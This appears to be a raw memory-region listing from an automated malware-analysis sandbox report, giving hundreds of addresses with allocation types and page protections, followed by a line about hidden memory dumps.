page read and write
3520000
heap
page read and write
8890000
trusted library allocation
page read and write
8850000
unkown
page read and write
6DE0000
trusted library allocation
page read and write
9A40000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
5B5E000
stack
page read and write
8885000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
4FF0000
heap
page read and write
97D0000
trusted library allocation
page read and write
475C000
stack
page read and write
5326000
trusted library allocation
page execute and read and write
4ECD000
heap
page read and write
85E0000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
A700000
trusted library allocation
page read and write
99A0000
unkown
page read and write
9840000
trusted library allocation
page read and write
956D000
stack
page read and write
95D0000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
5530000
direct allocation
page read and write
95C0000
unkown
page read and write
97D0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
6BF5AFF000
stack
page read and write
9770000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
7C08000
trusted library allocation
page read and write
7700000
trusted library allocation
page read and write
8836000
trusted library allocation
page read and write
8836000
trusted library allocation
page read and write
558C000
heap
page read and write
8838000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
9830000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
9B18000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
5490000
direct allocation
page read and write
9610000
trusted library allocation
page read and write
3580000
heap
page read and write
9A30000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
9860000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
5A20000
heap
page read and write
9760000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
99F0000
trusted library allocation
page read and write
17DC66C0000
heap
page read and write
8830000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
79C0000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
4DBE000
stack
page read and write
95D0000
unkown
page read and write
8870000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
9A20000
trusted library allocation
page read and write
A6C0000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
55B8000
heap
page read and write
99F0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
54A0000
direct allocation
page read and write
97D0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
8835000
trusted library allocation
page read and write
95D0000
unkown
page read and write
9740000
trusted library allocation
page read and write
78C0000
trusted library allocation
page read and write
9792000
trusted library allocation
page read and write
77B0000
trusted library allocation
page read and write
9760000
unkown
page read and write
9B20000
trusted library allocation
page read and write
33C5000
heap
page read and write
9840000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
A660000
trusted library allocation
page execute and read and write
9B10000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
8885000
unkown
page read and write
9B60000
trusted library allocation
page read and write
5590000
trusted library allocation
page read and write
7630000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
3688000
heap
page read and write
A690000
trusted library allocation
page read and write
910000
heap
page read and write
97D0000
trusted library allocation
page read and write
5583000
trusted library allocation
page read and write
55B8000
heap
page read and write
7770000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
3622000
heap
page read and write
9B20000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
35BD000
heap
page read and write
8830000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
96A0000
trusted library allocation
page read and write
553A000
heap
page read and write
9760000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
9B00000
trusted library allocation
page read and write
7690000
trusted library allocation
page read and write
5BC2000
trusted library allocation
page read and write
A6B0000
trusted library allocation
page read and write
51E0000
heap
page read and write
A6E0000
trusted library allocation
page read and write
17DC683A000
heap
page read and write
9760000
trusted library allocation
page read and write
9A50000
trusted library allocation
page read and write
4DC8000
heap
page read and write
4F90000
heap
page read and write
9AE0000
trusted library allocation
page read and write
A693000
trusted library allocation
page read and write
5303000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
534A000
heap
page read and write
7690000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
5548000
heap
page read and write
5332000
trusted library allocation
page read and write
55BF000
heap
page read and write
8890000
trusted library allocation
page read and write
A690000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
8723000
heap
page read and write
76A3000
trusted library allocation
page read and write
A6F0000
trusted library allocation
page read and write
9A20000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
4EDE000
heap
page read and write
9900000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9605000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
78F0000
trusted library allocation
page read and write
5480000
direct allocation
page read and write
85E0000
trusted library allocation
page read and write
8870000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
97D2000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
9720000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
A685000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
76A0000
trusted library allocation
page read and write
76ED000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9A50000
trusted library allocation
page read and write
7BE0000
trusted library allocation
page read and write
7690000
trusted library allocation
page read and write
9A03000
trusted library allocation
page read and write
9A27000
trusted library allocation
page read and write
8887000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
93E000
stack
page read and write
4EDA000
heap
page read and write
5430000
direct allocation
page read and write
4ED4000
heap
page read and write
4CDF000
stack
page read and write
A6F0000
trusted library allocation
page read and write
7680000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
8865000
unkown
page read and write
78C0000
trusted library allocation
page read and write
76A6000
trusted library allocation
page read and write
A6B0000
trusted library allocation
page read and write
A730000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
49E8000
heap
page read and write
9905000
trusted library allocation
page read and write
9855000
trusted library allocation
page read and write
99A0000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
5AF1000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9D50000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
7680000
trusted library allocation
page read and write
9B00000
trusted library allocation
page read and write
3632000
heap
page read and write
95E0000
trusted library allocation
page read and write
9B70000
trusted library allocation
page read and write
570D000
stack
page read and write
9A55000
unkown
page read and write
97A0000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
8860000
unkown
page read and write
8890000
trusted library allocation
page read and write
8620000
trusted library allocation
page read and write
4EE5000
heap
page read and write
A6E0000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
4F36000
heap
page read and write
8880000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
5450000
direct allocation
page read and write
55B8000
heap
page read and write
559B000
heap
page read and write
9730000
unkown
page read and write
97A0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
7600000
trusted library allocation
page read and write
9A00000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
8838000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
5430000
heap
page read and write
A6D0000
trusted library allocation
page read and write
A6F0000
trusted library allocation
page read and write
75E0000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
8865000
trusted library allocation
page read and write
8865000
trusted library allocation
page read and write
5C04000
trusted library allocation
page read and write
5594000
heap
page read and write
9740000
trusted library allocation
page read and write
96B5000
trusted library allocation
page read and write
86CA000
heap
page read and write
9B30000
trusted library allocation
page read and write
530D000
trusted library allocation
page execute and read and write
97D0000
trusted library allocation
page read and write
4F15000
heap
page read and write
5246000
direct allocation
page read and write
A685000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
5C0B000
heap
page read and write
95C5000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
9B10000
trusted library allocation
page read and write
4D7E000
stack
page read and write
A6D0000
trusted library allocation
page read and write
79C0000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
A6F0000
trusted library allocation
page read and write
7750000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
7C00000
trusted library allocation
page read and write
9A40000
trusted library allocation
page read and write
9770000
trusted library allocation
page read and write
8885000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
8880000
unkown
page read and write
9800000
trusted library allocation
page read and write
9AF3000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
4F38000
heap
page read and write
86C000
stack
page read and write
7730000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
86FF000
heap
page read and write
8837000
trusted library allocation
page read and write
2FD0000
heap
page read and write
A670000
trusted library allocation
page read and write
9C80000
trusted library allocation
page read and write
987D000
heap
page read and write
A680000
trusted library allocation
page read and write
5A57000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
8860000
unkown
page read and write
85E0000
trusted library allocation
page execute and read and write
9840000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
35CB000
heap
page read and write
7980000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
5D1C000
stack
page read and write
9790000
trusted library allocation
page read and write
4EDD000
heap
page read and write
5334000
direct allocation
page read and write
340E000
stack
page read and write
9800000
trusted library allocation
page read and write
9BF0000
unkown
page read and write
9860000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
9860000
trusted library allocation
page read and write
8885000
trusted library allocation
page read and write
875A000
heap
page read and write
8890000
trusted library allocation
page read and write
9A40000
trusted library allocation
page read and write
8840000
trusted library allocation
page read and write
17DC6836000
heap
page read and write
7C00000
trusted library allocation
page read and write
9B30000
trusted library allocation
page read and write
49CD000
stack
page read and write
97D0000
trusted library allocation
page read and write
8890000
trusted library allocation
page read and write
A674000
trusted library allocation
page read and write
7BF0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
A670000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
A690000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
8885000
trusted library allocation
page read and write
8860000
trusted library allocation
page read and write
8752000
heap
page read and write
9C20000
trusted library allocation
page read and write
76E0000
trusted library allocation
page read and write
A690000
trusted library allocation
page read and write
A6B0000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
33C0000
heap
page read and write
9BF0000
trusted library allocation
page read and write
580E000
stack
page read and write
9A50000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
9A20000
trusted library allocation
page read and write
4DF0000
heap
page read and write
9A50000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
9B22000
trusted library allocation
page read and write
9B00000
trusted library allocation
page read and write
8885000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
88B0000
unkown
page read and write
8850000
trusted library allocation
page read and write
A6B0000
trusted library allocation
page read and write
362D000
heap
page read and write
35C5000
heap
page read and write
99AE000
stack
page read and write
6BF5BFF000
stack
page read and write
17DC6829000
heap
page read and write
33B0000
heap
page read and write
9750000
trusted library allocation
page read and write
4950000
heap
page read and write
A680000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
95C0000
unkown
page read and write
5370000
heap
page read and write
8880000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
8890000
trusted library allocation
page execute and read and write
85C0000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
5537000
direct allocation
page read and write
97D0000
trusted library allocation
page read and write
8890000
unkown
page read and write
97F3000
trusted library allocation
page read and write
A6B0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
8723000
heap
page read and write
95C0000
trusted library allocation
page read and write
4EB8000
heap
page read and write
9A00000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
A6B0000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
361E000
heap
page read and write
97E0000
trusted library allocation
page read and write
465D000
stack
page read and write
98E0000
unkown
page read and write
9850000
trusted library allocation
page read and write
9780000
trusted library allocation
page execute and read and write
95E0000
trusted library allocation
page read and write
53D7000
heap
page read and write
4ED0000
heap
page read and write
9735000
unkown
page read and write
870C000
heap
page read and write
561A000
trusted library allocation
page read and write
4EDF000
heap
page read and write
9790000
trusted library allocation
page read and write
8840000
trusted library allocation
page read and write
88A0000
trusted library allocation
page read and write
99F0000
trusted library allocation
page read and write
2EEB000
stack
page read and write
86E0000
trusted library allocation
page read and write
53D6000
heap
page read and write
95C0000
trusted library allocation
page read and write
76F0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
86C0000
heap
page read and write
9760000
trusted library allocation
page read and write
527E000
stack
page read and write
9800000
trusted library allocation
page read and write
5330000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
538D000
heap
page read and write
9620000
trusted library allocation
page read and write
9B10000
trusted library allocation
page read and write
85B0000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
54AC000
direct allocation
page read and write
79C0000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
9A40000
trusted library allocation
page read and write
9A10000
trusted library allocation
page read and write
9B30000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
A6B0000
trusted library allocation
page read and write
7710000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
A6E0000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9840000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
9770000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9735000
trusted library allocation
page read and write
9810000
unkown
page read and write
99E0000
trusted library allocation
page read and write
97D0000
unkown
page read and write
523D000
stack
page read and write
A680000
trusted library allocation
page read and write
99A0000
trusted library allocation
page read and write
559D000
heap
page read and write
9790000
trusted library allocation
page read and write
8860000
unkown
page read and write
A710000
trusted library allocation
page read and write
5520000
trusted library allocation
page read and write
9AF0000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
A6B0000
trusted library allocation
page read and write
9B60000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
7780000
trusted library allocation
page read and write
8763000
heap
page read and write
9790000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
85B0000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
8865000
trusted library allocation
page read and write
9A50000
trusted library allocation
page read and write
53D4000
heap
page read and write
9A10000
trusted library allocation
page read and write
5A0F000
stack
page read and write
A6E0000
trusted library allocation
page read and write
5580000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
A6D0000
trusted library allocation
page read and write
33C0000
heap
page read and write
95C0000
trusted library allocation
page read and write
362D000
heap
page read and write
88B0000
trusted library allocation
page read and write
95E5000
unkown
page read and write
95C6000
unkown
page read and write
A680000
trusted library allocation
page read and write
9B20000
trusted library allocation
page read and write
7780000
trusted library allocation
page read and write
86C0000
trusted library allocation
page read and write
A710000
trusted library allocation
page read and write
875E000
heap
page read and write
5316000
direct allocation
page read and write
53DF000
heap
page read and write
9740000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
8830000
unkown
page read and write
9B00000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
8600000
trusted library allocation
page read and write
76D0000
trusted library allocation
page execute and read and write
9790000
trusted library allocation
page read and write
86FD000
heap
page read and write
9850000
trusted library allocation
page read and write
8870000
trusted library allocation
page execute and read and write
9750000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
4F11000
heap
page read and write
8860000
trusted library allocation
page read and write
52B3000
heap
page read and write
A680000
trusted library allocation
page read and write
9736000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
85F0000
trusted library allocation
page read and write
77F4000
trusted library allocation
page read and write
7770000
trusted library allocation
page read and write
95C0000
unkown
page read and write
9760000
trusted library allocation
page read and write
85C0000
trusted library allocation
page read and write
7C06000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
95E0000
trusted library allocation
page execute and read and write
7790000
trusted library allocation
page read and write
9AE0000
unkown
page read and write
55B8000
heap
page read and write
533C000
heap
page read and write
A6B0000
trusted library allocation
page read and write
9CA0000
trusted library allocation
page execute and read and write
348D000
stack
page read and write
9B10000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
4D30000
heap
page read and write
A660000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
95E5000
trusted library allocation
page read and write
9850000
trusted library allocation
page read and write
4F27000
heap
page read and write
9840000
trusted library allocation
page read and write
8880000
trusted library allocation
page read and write
9815000
trusted library allocation
page read and write
5550000
direct allocation
page read and write
9740000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9980000
trusted library allocation
page read and write
8830000
unkown
page read and write
8855000
trusted library allocation
page read and write
9740000
trusted library allocation
page execute and read and write
9810000
trusted library allocation
page read and write
9B10000
trusted library allocation
page read and write
556E000
heap
page read and write
97F7000
trusted library allocation
page read and write
A6A0000
trusted library allocation
page read and write
9810000
unkown
page read and write
A710000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
7010000
direct allocation
page read and write
A680000
trusted library allocation
page read and write
52B6000
heap
page read and write
9B10000
unkown
page read and write
There are 2188 hidden memdumps, click here to show them.